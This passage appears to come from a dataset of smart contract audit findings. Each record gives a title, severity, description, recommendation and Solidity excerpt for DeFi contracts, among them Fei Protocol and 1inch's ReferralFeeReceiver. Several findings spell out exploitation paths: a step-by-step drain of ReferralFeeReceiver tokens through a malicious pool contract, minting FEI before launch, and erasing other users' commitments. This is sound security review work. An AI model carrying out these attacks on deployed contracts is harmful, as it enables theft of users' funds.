add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n" +Commented out code in the codebase,medium,"There are many instances of code lines (and functions) that are commented out in the code base. Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThe main problem is that commented code adds confusion with no real benefit. Code should be code, and comments should be comments.\\nHere's a few examples of such lines of code, note that there are more.\\n```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n\\n```\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n```\\n\\nMany usage of `console.log()` and also the commented import on most of the contracts\\n```\\n // require(\\n // totalBorrow.mul(100) <= totalCollateral.mul(liquidationDiscountRatio),\\n // ""Collateral is not sufficient to be liquidated.""\\n // );\\n```\\n\\n```\\n // function \\_isETH(address \\_token) public view returns (bool) {\\n // return globalConfig.constants().ETH\\_ADDR() == \\_token;\\n // }\\n\\n // function getDivisor(address \\_token) public view returns (uint256) {\\n // if(\\_isETH(\\_token)) return INT\\_UNIT;\\n // return 10 \\*\\* uint256(getTokenDecimals(\\_token));\\n // }\\n```\\n\\n```\\n // require(\\_borrowLTV != 0, ""Borrow LTV is zero"");\\n require(\\_borrowLTV < SCALE, ""Borrow LTV must be less than Scale"");\\n // require(liquidationThreshold > \\_borrowLTV, ""Liquidation threshold must be greater than Borrow LTV"");\\n```\\n","In many of the above examples, it's not clear if the commented code is for testing or obsolete code (e.g. in the last example, can _borrowLTV ==0?) . All these instances should be reviewed and the system should be fully tested for all edge cases after the code changes.",,```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n +Emergency withdrawal code present,medium,"Code and functionality for emergency stop and withdrawal is present in this code base.\\n```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n\\n```\\n function emergencyWithdraw(address \\_token) external onlyEmergencyAddress {\\n SavingLib.emergencyWithdraw(globalConfig, \\_token);\\n }\\n```\\n\\n```\\n// rest of code\\n address payable public constant EMERGENCY\\_ADDR = 0xc04158f7dB6F9c9fFbD5593236a1a3D69F92167c;\\n// rest of code\\n```\\n",To remove the emergency code and fully test all the affected contracts.,,"```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n" +Accounts contains expensive looping,medium,"`Accounts.getBorrowETH` performs multiple external calls to `GlobalConfig` and `TokenRegistry` within a for loop:\\n```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(""tokenNum"", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n\\nThe loop also makes additional external calls and delegatecalls from:\\nTokenRegistry.priceFromIndex:\\n```\\nfunction priceFromIndex(uint index) public view returns(uint256) {\\n require(index < tokens.length, ""coinIndex must be smaller than the coins length."");\\n address tokenAddress = tokens[index];\\n // Temp fix\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n}\\n```\\n\\nAccounts.getBorrowBalanceCurrent:\\n```\\nfunction getBorrowBalanceCurrent(\\n address \\_token,\\n address \\_accountAddr\\n) public view returns (uint256 borrowBalance) {\\n AccountTokenLib.TokenInfo storage tokenInfo = accounts[\\_accountAddr].tokenInfos[\\_token];\\n uint accruedRate;\\n if(tokenInfo.getBorrowPrincipal() == 0) {\\n return 0;\\n } else {\\n if(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()) == 0) {\\n accruedRate = INT\\_UNIT;\\n } else {\\n accruedRate = globalConfig.bank().borrowRateIndexNow(\\_token)\\n .mul(INT\\_UNIT)\\n .div(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()));\\n }\\n return tokenInfo.getBorrowBalance(accruedRate);\\n }\\n}\\n```\\n\\nIn a worst case scenario, each iteration may perform a maximum of 25+ calls/delegatecalls. Assuming a maximum `tokenNum` of 128 (TokenRegistry.MAX_TOKENS), the gas cost for this method may reach upwards of 2 million for external calls alone.\\nGiven that this figure would only be a portion of the total transaction gas cost, `getBorrowETH` may represent a DoS risk within the `Accounts` contract.","Avoid for loops unless absolutely necessary\\nWhere possible, consolidate multiple subsequent calls to the same contract to a single call, and store the results of calls in local variables for re-use. For example,\\nInstead of this:\\n```\\nuint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n\\nModify `TokenRegistry` to support a single call, and cache intermediate results like this:\\n```\\nTokenRegistry registry = globalConfig.tokenInfoRegistry();\\nuint tokenNum = registry.getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n // here, getPriceFromIndex(i) performs all of the steps as the code above, but with only 1 ext call\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(registry.getPriceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n",,"```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(""tokenNum"", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n" +Naming inconsistency,low,There are some inconsistencies in the naming of some functions with what they do.\\n```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n,Review the code for the naming inconsistencies.,,```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n +TokenFaucet refill can have an unexpected outcome,medium,"The `TokenFaucet` contract can only disburse tokens to the users if it has enough balance. When the contract is running out of tokens, it stops dripping.\\n```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n\\nThe owners of the faucet can decide to refill the contract so it can disburse tokens again. If there's been a lot of time since the faucet was drained, the `lastDripTimestamp` value can be far behind the `currentTimestamp`. In that case, the users can instantly withdraw some amount (up to all the balance) right after the refill.","To avoid uncertainty, it's essential to call the `drip` function before the refill. If this call is made in a separate transaction, the owner should make sure that this transaction was successfully mined before sending tokens for the refill.",,"```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n" +Gas Optimization on transfers,low,"In TokenFaucet, on every transfer `_captureNewTokensForUser` is called twice. This function does a few calculations and writes the latest UserState to the storage. However, if `lastExchangeRateMantissa == exchangeRateMantissa`, or in other words, two transfers happen in the same block, there are no changes in the newToken amounts, so there is an extra storage store with the same values.\\n`deltaExchangeRateMantissa` will be 0 in case two transfers ( no matter from or to) are in the same block for a user.\\n```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n","Return without storage update if `lastExchangeRateMantissa == exchangeRateMantissa`, or by another method if `deltaExchangeRateMantissa == 0`. This reduces the gas cost for active users (high number of transfers that might be in the same block)",,"```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n" +Handle transfer tokens where from == to,low,"In TokenFaucet, when calling `beforeTokenTransfer` it should also be optimized when `to == from`. This is to prevent any possible issues with internal accounting and token drip calculations.\\n```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n","As ERC20 standard, `from == to` can be allowed but check in `beforeTokenTransfer` that if `to == from`, then do not call `_captureNewTokensForUser(from);` again.",,```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n +Redundant/Duplicate checks,low,"There are a few checks (require) in TokenFaucet that are redundant and/or checked twice.\\n```\\n require(\\_dripRatePerSecond > 0, ""TokenFaucet/dripRate-gt-zero"");\\n asset = \\_asset;\\n measure = \\_measure;\\n setDripRatePerSecond(\\_dripRatePerSecond);\\n```\\n\\n```\\n function setDripRatePerSecond(uint256 \\_dripRatePerSecond) public onlyOwner {\\n require(\\_dripRatePerSecond > 0, ""TokenFaucet/dripRate-gt-zero"");\\n```\\n\\n\\n```\\n function drip() public returns (uint256) {\\n uint256 currentTimestamp = \\_currentTime();\\n\\n // this should only run once per block.\\n if (lastDripTimestamp == uint32(currentTimestamp)) {\\n return 0;\\n }\\n// rest of code\\n uint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\n// rest of code\\n if (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n// rest of code\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0; \\n```\\n",Remove the redundant checks to reduce the code size and complexity.,,"```\\n require(\\_dripRatePerSecond > 0, ""TokenFaucet/dripRate-gt-zero"");\\n asset = \\_asset;\\n measure = \\_measure;\\n setDripRatePerSecond(\\_dripRatePerSecond);\\n```\\n" +GenesisGroup.commit overwrites previously-committed values,high,"`commit` allows anyone to `commit` purchased FGEN to a swap that will occur once the genesis group is launched. This commitment may be performed on behalf of other users, as long as the calling account has sufficient allowance:\\n```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n\\nThe `amount` stored in the recipient's `committedFGEN` balance overwrites any previously-committed value. Additionally, this also allows anyone to commit an `amount` of “0” to any account, deleting their commitment entirely.",Ensure the committed amount is added to the existing commitment.,,"```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n" +UniswapIncentive overflow on pre-transfer hooks,high,"Before a token transfer is performed, `Fei` performs some combination of mint/burn operations via UniswapIncentive.incentivize:\\n```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), ""UniswapIncentive: Blocked Fei sender or operator"");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n\\nBoth `incentivizeBuy` and `incentivizeSell` calculate buy/sell incentives using overflow-prone math, then mint / burn from the target according to the results. This may have unintended consequences, like allowing a caller to mint tokens before transferring them, or burn tokens from their recipient.\\n`incentivizeBuy` calls `getBuyIncentive` to calculate the final minted value:\\n```\\nfunction incentivizeBuy(address target, uint amountIn) internal ifMinterSelf {\\n if (isExemptAddress(target)) {\\n return;\\n }\\n\\n (uint incentive, uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation) = getBuyIncentive(amountIn);\\n\\n updateTimeWeight(initialDeviation, finalDeviation, weight);\\n if (incentive != 0) {\\n fei().mint(target, incentive); \\n }\\n}\\n```\\n\\n`getBuyIncentive` calculates price deviations after casting `amount` to an `int256`, which may overflow:\\n```\\nfunction getBuyIncentive(uint amount) public view override returns(\\n uint incentive,\\n uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation\\n) {\\n (initialDeviation, finalDeviation) = getPriceDeviations(-1 \\* int256(amount));\\n```\\n",Resolution\\nThis was addressed in fei-protocol/fei-protocol-core#15.\\nEnsure casts in `getBuyIncentive` and `getSellPenalty` do not overflow.,,"```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), ""UniswapIncentive: Blocked Fei sender or operator"");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n" +BondingCurve allows users to acquire FEI before launch,medium,"`BondingCurve.allocate` allocates the protocol's held PCV, then calls `_incentivize`, which rewards the caller with FEI if a certain amount of time has passed:\\n```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n\\n`allocate` can be called before genesis launch, as long as the contract holds some nonzero PCV. By force-sending the contract 1 wei, anyone can bypass the majority of checks and actions in `allocate`, and mint themselves FEI each time the timer expires.",Prevent `allocate` from being called before genesis launch.,,"```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n" +Overflow/underflow protection,medium,"Having overflow/underflow vulnerabilities is very common for smart contracts. It is usually mitigated by using `SafeMath` or using solidity version ^0.8 (after solidity 0.8 arithmetical operations already have default overflow/underflow protection).\\nIn this code, many arithmetical operations are used without the ‘safe' version. The reasoning behind it is that all the values are derived from the actual ETH values, so they can't overflow.\\nOn the other hand, some operations can't be checked for overflow/underflow without going much deeper into the codebase that is out of scope:\\n```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n","Resolution\\nThis was partially addressed in fei-protocol/fei-protocol-core#17 by using `SafeMath` for the specific example given in the description.\\nIn our opinion, it is still safer to have these operations in a safe mode. So we recommend using `SafeMath` or solidity version ^0.8 compiler.",,```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n +Unchecked return value for IWETH.transfer call,medium,"In `EthUniswapPCVController`, there is a call to `IWETH.transfer` that does not check the return value:\\n```\\nweth.transfer(address(pair), amount);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransfer; unless one is sure the given token reverts in case of a failure.",Consider adding a require-statement or using `safeTransfer`.,,"```\\nweth.transfer(address(pair), amount);\\n```\\n" +GenesisGroup.emergencyExit remains functional after launch,medium,"`emergencyExit` is intended as an escape mechanism for users in the event the genesis `launch` method fails or is frozen. `emergencyExit` becomes callable 3 days after `launch` is callable. These two methods are intended to be mutually-exclusive, but are not: either method remains callable after a successful call to the other.\\nThis may result in accounting edge cases. In particular, `emergencyExit` fails to decrease `totalCommittedFGEN` by the exiting user's commitment:\\n```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n\\nAs a result, calling launch after a user performs an exit will incorrectly calculate the amount of FEI to swap:\\n```\\nuint amountFei = feiBalance() \\* totalCommittedFGEN / (totalSupply() + totalCommittedFGEN);\\nif (amountFei != 0) {\\n totalCommittedTribe = ido.swapFei(amountFei);\\n}\\n```\\n","Ensure `launch` cannot be called if `emergencyExit` has been called\\nEnsure `emergencyExit` cannot be called if `launch` has been called\\nIn `emergencyExit`, reduce `totalCommittedFGEN` by the exiting user's committed amount",,"```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n" +Unchecked return value for transferFrom calls,medium,"There are two `transferFrom` calls that do not check the return value (some tokens signal failure by returning false):\\n```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n\\n```\\nfei().transferFrom(msg.sender, address(pair), amountFei);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransferFrom; unless one is sure the given token reverts in case of a failure.",Consider adding a require-statement or using `safeTransferFrom`.,,"```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n" +Pool: claiming to the pool itself causes accounting issues,low,"```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, ""Pool: User has no redeemable pool tokens"");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n\\nIf the destination address `to` is the pool itself, the pool will burn tokens and increment the amount of tokens claimed, then transfer the reward tokens `to` itself.",Resolution\\nThis was addressed in fei-protocol/fei-protocol-core#57\\nPrevent claims from specifying the pool as a destination.,,"```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, ""Pool: User has no redeemable pool tokens"");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n" +Assertions that can fail,low,"In `UniswapSingleEthRouter` there are two assert-statements that may fail:\\n```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n\\n```\\nassert(IWETH(WETH).transfer(address(PAIR), amountIn));\\n```\\n\\nSince they do some sort of input validation it might be good to replace them with require-statements. I would only use asserts for checks that should never fail and failure would constitute a bug in the code.",Consider replacing the assert-statements with require-statements. An additional benefit is that this will not result in consuming all the gas in case of a violation.,,```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n +Simplify API of GenesisGroup.purchase,low,"The API of `GenesisGroup.purchase` could be simplified by not including the `value` parameter that is required to be equivalent to msg.value:\\n```\\nrequire(msg.value == value, ""GenesisGroup: value mismatch"");\\n```\\n\\nUsing `msg.value` might make the API more explicit and avoid requiring `msg.value == value`. It can also save some gas due to fewer inputs and fewer checks.",Consider dropping the `value` parameter and changing the code to use `msg.value` instead.,,"```\\nrequire(msg.value == value, ""GenesisGroup: value mismatch"");\\n```\\n" +[Out of Scope] ReferralFeeReceiver - anyone can steal all the funds that belong to ReferralFeeReceiver Unverified,high,"Note: This issue was raised in components that were being affected by the scope reduction as outlined in the section “Scope” and are, therefore, only shallowly validated. Nevertheless, we find it important to communicate such potential findings and ask the client to further investigate.\\nThe `ReferralFeeReceiver` receives pool shares when users `swap()` tokens in the pool. A `ReferralFeeReceiver` may be used with multiple pools and, therefore, be a lucrative target as it is holding pool shares.\\nAny token or `ETH` that belongs to the `ReferralFeeReceiver` is at risk and can be drained by any user by providing a custom `mooniswap` pool contract that references existing token holdings.\\nIt should be noted that none of the functions in `ReferralFeeReceiver` verify that the user-provided `mooniswap` pool address was actually deployed by the linked `MooniswapFactory`. The factory provides certain security guarantees about `mooniswap` pool contracts (e.g. valid `mooniswap` contract, token deduplication, tokenA!=tokenB, enforced token sorting, …), however, since the `ReferralFeeReceiver` does not verify the user-provided `mooniswap` address they are left unchecked.\\nAdditional Notes\\n`freezeEpoch` - (callable by anyone) performs a `pool.withdraw()` with the `minAmounts` check being disabled. This may allow someone to call this function at a time where the contract actually gets a bad deal.\\n`trade` - (callable by anyone) can intentionally be used to perform bad trades (front-runnable)\\n`trade` - (callable by anyone) appears to implement inconsistent behavior when sending out `availableBalance`. `ETH` is sent to `tx.origin` (the caller) while tokens are sent to the user-provided `mooniswap` address.\\n```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n\\nmultiple methods - since `mooniswap` is a user-provided address there are a lot of opportunities to reenter the contract. Consider adding reentrancy guards as another security layer (e.g. `claimCurrentEpoch` and others).\\nmultiple methods - do not validate the amount of tokens that are returned, causing an evm assertion due to out of bounds index access.\\n```\\nIERC20[] memory tokens = mooniswap.getTokens();\\nuint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\nuint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n```\\n\\nin `GovernanceFeeReceiver` anyone can intentionally force unwrapping of pool tokens or perform swaps in the worst time possible. e.g. The checks for `withdraw(..., minAmounts)` is disabled.\\n```\\nfunction unwrapLPTokens(Mooniswap mooniswap) external validSpread(mooniswap) {\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n}\\n\\nfunction swap(IERC20[] memory path) external validPath(path) {\\n (uint256 amount,) = \\_maxAmountForSwap(path, path[0].uniBalanceOf(address(this)));\\n uint256 result = \\_swap(path, amount, payable(address(rewards)));\\n rewards.notifyRewardAmount(result);\\n}\\n```\\n\\nA malicious user can drain all token by calling `claimFrozenEpoch` with a custom contract as `mooniswap` that returns a token address the `ReferralFeeReceiver` contracts holds token from in `IERC20[] memory tokens = mooniswap.getTokens();`. A subsequent call to `_transferTokenShare()` will then send out any amount of token requested by the attacker to the attacker-controlled address (msg.sender).\\nLet's assume the following scenario:\\n`ReferralFeeReceiver` holds `DAI` token and we want to steal them.\\nAn attacker may be able to drain the contract from `DAI` token via `claimFrozenToken` if\\nthey control the `mooniswap` address argument and provide a malicious contract\\n`user.share[mooniswap][firstUnprocessedEpoch] > 0` - this can be arbitrarily set in `updateReward`\\n`token.epochBalance[currentEpoch].token0Balance > 0` - this can be manipulated in `freezeEpoch` by providing a malicious `mooniswap` contract\\nthey own a worthless `ERC20` token e.g. named `ATTK`\\nThe following steps outline the attack:\\nThe attacker calls into `updateReward` to set `user.share[mooniswap][currentEpoch]` to a value that is greater than zero to make sure that `share` in `claimFrozenEpoch` takes the `_transferTokenShare` path.\\n```\\nfunction updateReward(address referral, uint256 amount) external override {\\n Mooniswap mooniswap = Mooniswap(msg.sender);\\n TokenInfo storage token = tokenInfo[mooniswap];\\n UserInfo storage user = userInfo[referral];\\n uint256 currentEpoch = token.currentEpoch;\\n\\n // Add new reward to current epoch\\n user.share[mooniswap][currentEpoch] = user.share[mooniswap][currentEpoch].add(amount);\\n token.epochBalance[currentEpoch].totalSupply = token.epochBalance[currentEpoch].totalSupply.add(amount);\\n\\n // Collect all processed epochs and advance user token epoch\\n \\_collectProcessedEpochs(user, token, mooniswap, currentEpoch);\\n}\\n```\\n\\nThe attacker then calls `freezeEpoch()` providing the malicious `mooniswap` contract address controlled by the attacker.\\nThe malicious contract returns token that is controlled by the attacker (e.g. ATTK) in a call to `mooniswap.getTokens();`\\nThe contract then stores the current balance of the attacker-controlled token in `token0Balance/token1Balance`. Note that the token being returned here by the malicious contract can be different from the one we're checking out in the last step (balance manipulation via `ATTK`, checkout of `DAI` in the last step).\\nThen the contract calls out to the malicious `mooniswap` contract. This gives the malicious contract an easy opportunity to send some attacker-controlled token (ATTK) to the `ReferralFeeReceiver` in order to freely manipulate the frozen tokenbalances (tokens[0].uniBalanceOf(address(this)).sub(token0Balance);).\\nNote that the used token addresses are never stored anywhere. The balances recorded here are for an attacker-controlled token (ATTK), not the actual one that we're about to steal (e.g. DAI)\\nThe token balances are now set-up for checkout in the last step (claimFrozenEpoch).\\n```\\nfunction freezeEpoch(Mooniswap mooniswap) external validSpread(mooniswap) {\\n TokenInfo storage token = tokenInfo[mooniswap];\\n uint256 currentEpoch = token.currentEpoch;\\n require(token.firstUnprocessedEpoch == currentEpoch, ""Previous epoch is not finalized"");\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n uint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\n uint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n token.epochBalance[currentEpoch].token0Balance = tokens[0].uniBalanceOf(address(this)).sub(token0Balance);\\n token.epochBalance[currentEpoch].token1Balance = tokens[1].uniBalanceOf(address(this)).sub(token1Balance);\\n token.currentEpoch = currentEpoch.add(1);\\n}\\n```\\n\\nA call to `claimFrozenEpoch` checks-out the previously frozen token balance.\\nThe `claim > 0` requirement was fulfilled in step 1.\\nThe token balance was prepared for the attacker-controlled token (ATTK) in step 2, but we're now checking out `DAI`.\\nWhen the contract calls out to the attackers `mooniswap` contract the call to `IERC20[] memory tokens = mooniswap.getTokens();` returns the address of the token to be stolen (e.g. DAI) instead of the attacker-controlled token (ATTK) that was used to set-up the balance records.\\nSubsequently, the valuable target tokens (DAI) are sent out to the caller in `_transferTokenShare`.\\n```\\nif (share > 0) {\\n EpochBalance storage epochBalance = token.epochBalance[firstUnprocessedEpoch];\\n uint256 totalSupply = epochBalance.totalSupply;\\n user.share[mooniswap][firstUnprocessedEpoch] = 0;\\n epochBalance.totalSupply = totalSupply.sub(share);\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n epochBalance.token0Balance = \\_transferTokenShare(tokens[0], epochBalance.token0Balance, share, totalSupply);\\n epochBalance.token1Balance = \\_transferTokenShare(tokens[1], epochBalance.token1Balance, share, totalSupply);\\n epochBalance.inchBalance = \\_transferTokenShare(inchToken, epochBalance.inchBalance, share, totalSupply);\\n```\\n","Resolution\\nAccording to the client, this issue is addressed in 1inch-exchange/1inch-liquidity-protocol#2 and the reentrancy in `FeeReceiver` in 1inch-exchange/[email protected]e9c6a03\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nEnforce that the user-provided `mooniswap` contract was actually deployed by the linked factory. Other contracts cannot be trusted. Consider implementing token sorting and de-duplication (tokenA!=tokenB) in the pool contract constructor as well. Consider employing a reentrancy guard to safeguard the contract from reentrancy attacks.\\nImprove testing. The methods mentioned here are not covered at all. Improve 